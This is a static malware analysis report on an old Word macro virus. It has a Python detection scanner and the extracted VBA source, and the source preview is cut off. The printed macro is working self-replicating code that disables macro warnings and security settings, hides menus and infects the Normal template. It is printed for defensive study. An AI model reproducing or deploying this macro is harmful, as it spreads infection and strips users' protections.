Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f81d453292048b79…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 38.0 KB
Created: 2003-03-30 17:32:00
Authoring application: Microsoft Word 10.0 (Word 2002)
First seen: 2012-06-14
MD5: 6cf6479fc338dc47c71de00950ec400c
SHA-1: 8b0b01bedc416868180385efaf2ee97e57efcbfb
SHA-256: f81d453292048b79aa0fe6b06ec2d6ac8e9d88d879083c8f526185aa9c19e120
Risk score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1562.001 Impair Defenses: Disable or Modify Tools; T1112 Modify Registry; T1137.001 Office Application Startup: Office Template Macros

The sample carries a VBA module (Modulo1) whose Document_Open handler runs as soon as the document is opened. After an On Error Resume Next that swallows every failure, the macro does four things in sequence:

  • It switches off Word's built-in macro warning (Options.VirusProtection = False) together with the ConfirmConversions and SaveNormalPrompt prompts, so the Normal template can later be saved without the user noticing.
  • It writes Level = 1 and AccessVBOM = 1 under HKEY_CURRENT_USER\Software\Microsoft\Office\<version>\Word\Security through System.PrivateProfileString. Level 1 is the "Low" macro security setting, and AccessVBOM grants programmatic access to the VBA project, which the replication step below depends on.
  • It disables the Tools > Macro, Templates and Add-Ins and Customize entries, View > Toolbars and Status Bar, Macro > Macros and Security, and Format > Style, so the user cannot easily reach the macro editor or the security dialog.
  • It infects the Normal template: the macro copies its own code module into NormalTemplate.VBProject (and, in the opposite direction, re-infects the active document from an already infected Normal template), renames the component to ZWMVC_Macro as an infection marker, and saves the template.

Copying into the Normal template makes the macro run in every document opened afterwards, which is the classic Word macro virus replication pattern; the author's comment ('WordMacro/ZWMVC.ZWMVC_Macro constructed by Zed, 30/03/2003') matches the file's creation date. The variable names are randomised, but the Word object-model calls are not, and those are what give the behaviour away. The preview of the module is truncated, so the CreateObject call reported by the heuristics is not visible in the portion shown here. The ClamAV name Win.Trojan.W97M-10 (W97M denotes Word 97 macro malware) is consistent with a self-replicating macro virus rather than a downloader.

Heuristics (5)

  • ClamAV: Win.Trojan.W97M-10 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.W97M-10
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Auto-execution handler: the macro runs when the document is opened
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call (not in the portion of the source shown in the preview below)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches documents whose source has been removed or could not be extracted (p-code-only or "VBA stomping" cases), where the visible source alone would miss the behaviour.
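Worked triage of the behaviours summarised above, as an added example that is not part of this report's pipeline or of oletools. It is a stdlib-only Python scanner that takes decoded VBA text (such as the carved macros.bas), strips comments, joins VBA ' _' line continuations so that the registry path built across two lines is seen whole, and matches on Word object-model and API names rather than on identifiers, so the randomised variable names do not defeat it. The rule names, the ATT&CK mapping and the trimmed sample excerpt are the example's own.

```python
"""Behavioural triage of decoded VBA source (stdlib only).  Added example for
this report, not part of its pipeline or of oletools: rule names and the
ATT&CK mapping are the example's own, chosen to match the findings above."""
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Finding:
    rule: str      # example's own rule name
    attack: str    # MITRE ATT&CK technique the behaviour maps to
    line: int      # 1-based physical line where the statement starts
    evidence: str  # comment-stripped, continuation-joined statement

# Patterns key on Word object-model / API names, never on variable names, so
# the randomised identifiers this sample uses do not hide anything.
RULES = [
    ("auto_exec_handler", "T1059.005",
     r"\bSub\s+(?:Document_Open|Document_Close|AutoOpen|AutoExec|AutoClose)\b"),
    ("virus_protection_disabled", "T1562.001", r"\bOptions\.VirusProtection\s*=\s*False\b"),
    ("office_security_regkey", "T1112", r"Software\\Microsoft\\Office\\.*\\Security\b"),
    ("registry_write_profilestring", "T1112", r"\bPrivateProfileString\s*\(.*\)\s*="),
    ("macro_security_values", "T1562.001", r'"(?:Level|AccessVBOM)"'),
    ("commandbar_disabled", "T1562.001", r"\bCommandBars\s*\(.*\)\.Enabled\s*=\s*False\b"),
    ("normal_template_vbproject", "T1137.001", r"\bNormalTemplate\.VBProject\b"),
    ("code_module_write", "T1137.001", r"\.(?:InsertLines|AddFromString|AddFromFile)\b"),
    ("normal_template_saved", "T1137.001", r"\bNormalTemplate\.Save\b"),
]
COMPILED = [(rule, attack, re.compile(pat, re.I)) for rule, attack, pat in RULES]

def strip_comment(line: str) -> str:
    """Drop a trailing ' comment unless the apostrophe sits inside a string."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line

def statements(source: str):
    """Yield (first_line_no, statement), joining VBA ' _' line continuations."""
    buf, start = [], 0
    for no, raw in enumerate(source.splitlines(), 1):
        text = strip_comment(raw).strip()
        start = start or no
        if re.search(r"\s_$", text):        # statement continues on next line
            buf.append(text[:-1].rstrip())
            continue
        buf.append(text)
        yield start, " ".join(buf)
        buf, start = [], 0
    if buf:                                  # continuation dangling at EOF
        yield start, " ".join(buf)

def scan(source: str) -> list[Finding]:
    """One Finding per (statement, rule) match, in source order."""
    found = []
    for no, stmt in statements(source):
        for rule, attack, pat in COMPILED:
            if pat.search(stmt):
                found.append(Finding(rule, attack, no, stmt))
    return found

def verdict(findings: list[Finding]) -> str:
    """Roll the hits up into the kind of call the report summary makes."""
    hit = {f.rule for f in findings}
    if {"auto_exec_handler", "normal_template_vbproject", "code_module_write"} <= hit:
        return "macro virus: auto-exec macro copies itself into the Normal template"
    if "auto_exec_handler" in hit and hit & {"virus_protection_disabled", "macro_security_values"}:
        return "suspicious: auto-exec macro lowers Word macro security"
    return "auto-exec macro" if "auto_exec_handler" in hit else "no auto-exec behaviour"

# Constructed input: an excerpt of the macros.bas carved from this sample,
# trimmed (If/End If guards around single statements collapsed) to stay short.
SAMPLE = r'''
' WordMacro/ZWMVC.ZWMVC_Macro constructed by Zed, 30/03/2003
Private Sub Document_Open()
Options.VirusProtection = False
q7o3z6k8N10i10k1V9b7U10M1i2i4f7g5o10h9v5 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" _
& Application.Version & "\Word\Security"
For M1R1X5h4e5P10K4a8B3w6p6N3 = 0 To 1
    S8R5f7v6N1u8M4E5j2C7X8l9J2J1 = Array("Level", "AccessVBOM")
    System.PrivateProfileString("", q7o3z6k8N10i10k1V9b7U10M1i2i4f7g5o10h9v5, S8R5f7v6N1u8M4E5j2C7X8l9J2J1(M1R1X5h4e5P10K4a8B3w6p6N3)) = 1&
Next M1R1X5h4e5P10K4a8B3w6p6N3
CommandBars("Format").Controls("Style...").Enabled = False
Set n10G8L7g10J3v5A7Y9 = ActiveDocument.VBProject.VBComponents(1)
Set n4u1h6K10w8W5Y9L9f9M6I9C6 = NormalTemplate.VBProject.VBComponents(1)
If n4u1h6K10w8W5Y9L9f9M6I9C6.Name <> "ZWMVC_Macro" Then
    Set l7d7c7d5r10N1M2o8 = n4u1h6K10w8W5Y9L9f9M6I9C6.CodeModule
    l7d7c7d5r10N1M2o8.InsertLines 1, n10G8L7g10J3v5A7Y9.CodeModule.Lines(1, n10G8L7g10J3v5A7Y9.CodeModule.CountOfLines)
    n4u1h6K10w8W5Y9L9f9M6I9C6.Name = "ZWMVC_Macro"
End If
NormalTemplate.Save
End Sub
'''.strip("\n")

if __name__ == "__main__":
    hits = scan(SAMPLE)
    for f in hits:
        print(f"{f.line:>3}  {f.attack:<9}  {f.rule:<29} {f.evidence[:50]}")
    print(verdict(hits))
```

Run on the excerpt it lists nine hits in source order and ends with the macro-virus verdict. The Normal template rules are what separate a self-replicating macro from a one-shot downloader; a plain keyword count would flag both the same way, and the registry rule only fires because the two physical lines of the key path are joined before matching.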

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  9068 bytes
SHA-256: 6c351e683dc3b88ef25eeaca171397769b58558ffe13451da78f1abcb8852b4c

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modulo1"
' WordMacro/ZWMVC.ZWMVC_Macro constructed by Zed, 30/03/2003
Private Declare Function SetSysColors Lib "user32" (ByVal nChanges As Long, lpSysColor As Long, lpColorValues As Long) As Long
Private Sub Document_Open()
On Error Resume Next
If Options.VirusProtection = True Then
    Options.VirusProtection = False
End If
If Options.ConfirmConversions = True Then
    Options.ConfirmConversions = False
End If
If Options.SaveNormalPrompt = True Then
    Options.SaveNormalPrompt = False
End If
q7o3z6k8N10i10k1V9b7U10M1i2i4f7g5o10h9v5 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" _
& Application.Version & "\Word\Security"
For M1R1X5h4e5P10K4a8B3w6p6N3 = 0 To 1
    S8R5f7v6N1u8M4E5j2C7X8l9J2J1 = Array("Level", "AccessVBOM")
    C10z5X7w7H3S5m6c5J3b2N6S2Z4P9s2f9m6m1o1Z9k3i3t8r4 = S8R5f7v6N1u8M4E5j2C7X8l9J2J1(M1R1X5h4e5P10K4a8B3w6p6N3)
    System.PrivateProfileString("", q7o3z6k8N10i10k1V9b7U10M1i2i4f7g5o10h9v5, C10z5X7w7H3S5m6c5J3b2N6S2Z4P9s2f9m6m1o1Z9k3i3t8r4) = 1&
Next M1R1X5h4e5P10K4a8B3w6p6N3
For c1m5z2F1D4p8s7D3H4s8E4y10n10v3 = 0 To 2
    p7X1q7m5P1e9M3w1j5c6a1 = Array("Macro", "Templates and Add-Ins...", "Customize...")
    E2E2X5G2A6d9W5m7X10 = p7X1q7m5P1e9M3w1j5c6a1(c1m5z2F1D4p8s7D3H4s8E4y10n10v3)
    If CommandBars("Tools").Controls(E2E2X5G2A6d9W5m7X10).Enabled = True Then
        CommandBars("Tools").Controls(E2E2X5G2A6d9W5m7X10).Enabled = False
    End If
Next c1m5z2F1D4p8s7D3H4s8E4y10n10v3
For K8o10n4e9M2i5w10p6X7G6x3y1K10 = 0 To 1
    X7P1b1t5n1R5e2K8D1c6P5 = Array("Toolbars", "Status Bar")
    z4t5e6R6w7d6K7g2B2v2C10o7r2L5n5u10j7j1D8i9w10x6G3K7T9 = X7P1b1t5n1R5e2K8D1c6P5(K8o10n4e9M2i5w10p6X7G6x3y1K10)
    If CommandBars("View").Controls(z4t5e6R6w7d6K7g2B2v2C10o7r2L5n5u10j7j1D8i9w10x6G3K7T9).Enabled = True Then
        CommandBars("View").Controls(z4t5e6R6w7d6K7g2B2v2C10o7r2L5n5u10j7j1D8i9w10x6G3K7T9).Enabled = False
    End If
Next K8o10n4e9M2i5w10p6X7G6x3y1K10
For I2K6K10H8C5W4Q4t2Z6N1j8Z10O6x6C7c6T5r1J7I10n9g6 = 0 To 1
    u2w10j5X9Y6A8I4P3T10N3u8r10c4o8j5G10J8n1d3V10V8A3Q1J8o6 = Array("Macros...", "Security...")
    R6q9Q4 = u2w10j5X9Y6A8I4P3T10N3u8r10c4o8j5G10J8n1d3V10V8A3Q1J8o6(I2K6K10H8C5W4Q4t2Z6N1j8Z10O6x6C7c6T5r1J7I10n9g6)
    If CommandBars("Macro").Controls(R6q9Q4).Enabled = True Then
        CommandBars("Macro").Controls(R6q9Q4).Enabled = False
    End If
Next I2K6K10H8C5W4Q4t2Z6N1j8Z10O6x6C7c6T5r1J7I10n9g6
If CommandBars("Format").Controls("Style...").Enabled = True Then
    CommandBars("Format").Controls("Style...").Enabled = False
End If
Set n10G8L7g10J3v5A7Y9 = ActiveDocument.VBProject.VBComponents(1)
Set n4u1h6K10w8W5Y9L9f9M6I9C6 = NormalTemplate.VBProject.VBComponents(1)
If n4u1h6K10w8W5Y9L9f9M6I9C6.Name <> "ZWMVC_Macro" Then
    Set l7d7c7d5r10N1M2o8 = n4u1h6K10w8W5Y9L9f9M6I9C6.CodeModule
    Set F7H1l6a5K1F10w1y5x7D7D9 = n10G8L7g10J3v5A7Y9.CodeModule
    l7d7c7d5r10N1M2o8.DeleteLines 1, l7d7c7d5r10N1M2o8.CountOfLines
    l7d7c7d5r10N1M2o8.InsertLines 1, F7H1l6a5K1F10w1y5x7D7D9.Lines(1, F7H1l6a5K1F10w1y5x7D7D9.CountOfLines)
    n4u1h6K10w8W5Y9L9f9M6I9C6.Name = "ZWMVC_Macro"
End If
If n10G8L7g10J3v5A7Y9.Name <> "ZWMVC_Macro" Then
    Set Y6t4I6i4o9 = n10G8L7g10J3v5A7Y9.CodeModule
    Set K10r5I2d7f3F10e5Q2d9c2b10P10Z1n8w7U8n5K8D10E8u5p4n10y5 = n4u1h6K10w8W5Y9L9f9M6I9C6.CodeModule
    Y6t4I6i4o9.DeleteLines 1, Y6t4I6i4o9.CountOfLines
    Y6t4I6i4o9.InsertLines 1, K10r5I2d7f3F10e5Q2d9c2b10P10Z1n8w7U8n5K8D10E8u5p4n10y5.Lines(1, K10r5I2d7f3F10e5Q2d9c2b10P10Z1n8w7U8n5K8D10E8u5p4n10y5.CountOfLines)
    n10G8L7g10J3v5A7Y9.Name = "ZWMVC_Macro"
End If
If n4u1h6K10w8W5Y9L9f9M6I9C6.Name = "ZWMVC_Macro" Then
    NormalTemplate.Save
    NormalTemplate.Saved = True
End If

    Do
    l7d7c7d5r10N1M2o8 = l7d7c7d5r10N1M2o8 + 1
    Random
... (truncated)